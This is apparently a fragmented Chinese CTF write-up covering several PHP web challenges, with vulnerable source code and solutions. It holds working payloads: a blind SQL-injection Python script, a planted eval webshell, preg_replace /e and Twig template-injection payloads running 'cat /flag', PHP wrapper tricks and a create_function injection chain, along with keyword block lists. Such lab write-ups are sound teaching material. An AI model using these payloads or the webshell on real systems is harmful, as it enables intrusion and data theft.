$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo 'source_code';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
f=phpinfo
,发现flag相关线索auto_append_file d0g3_f1ag.php
show_image
,会把$_SESSION[img]中的东西base64解码然后显示出来img_path
进行了处理,所以不能直接利用extract($_POST);
,存在变量覆盖filter
函数中会把flag和php替换为空,且是先序列化再过滤_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
$flag = 'flag in /d0g3_fllllllag';
?>
phtml
绕过image.php?id=1
,猜测存在sql注入,看一下备份<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id); //转义
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
'
,所以我们用\0
转义单引号,输入\0
,经过addslashes
函数会先变成\\0
,然后经过str_replace
函数,会变成\
,可以转义id后面的引号,构造成select * from images where id='\' or path=' or 1=1#
import requests
re1 = requests.session()
url = "http://1247dad7-f45e-43b0-93f5-4c3fbf890b7c.node3.buuoj.cn/image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
l = 32
r = 130
mid = (l + r)>>1
while(l<r):
payloads = payload.format(i,mid)
# print(url+payloads)
html = re1.get(url+payloads)
if "JFIF" in html.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result+=chr(mid)
print(result)
admin a2869e6057728e5dbb5d
User admin uploaded file 1.png. User admin uploaded file 1.png. User admin uploaded file 1.png.
,记录了文件名,所以可以修改文件名上马,这里用的是php短标签,传入filename==$_GET['cmd']; eval($_POST['cmd']); ?>
.git
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
foreach($_POST as $x => $y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
exit($is);
}
echo "the flag is: ".$flag;
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "
"
.file_get_contents($text,'r')."";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
get方式提交text和file
text可以使用伪协议构造出来等于I have a dream
file中不能有flag
构造text=data:text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
读得next.php的源码
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
next.php?\S*=${getflag()}&cmd=system("cat /flag");
{{system("cat /flag")}}
获得flag{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
1nD3x.php
highlight_file(__FILE__);
error_reporting(0);
$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';
echo "
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
";
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!
";
}
} else die('fxck you! What do you want to do ?!');
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?
";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>
代码很长
首先是对$_SERVER[‘QUERY_STRING’]进行了限值,可以用urlencode绕过
绕过preg_match('/^aqua_is_cute$/'
,在debu后加上%0a,因为preg_match只匹配第一行
file_get_contents
是用data://协议或者php://input
sha1()使用数组绕过
当时做题时是非预期做的,再复现的时候忘了怎么做的了,还好Y1NG师傅当时把我的payload写到博客里了,链接
我的payload1nD3x.php?zuishuai=y1ngzuishuai &y1ng[]=111&passwd[]=222&passwd[]=222&flag[arg]=}var_dump(require(end(pos(get_defined_vars()))));//&flag[code]=create_function&file=data://text/plain,y1ng_YuZhou_Wudi_zuishuai&rdd=php://filter/convert.base64-encode/resource=1flag.php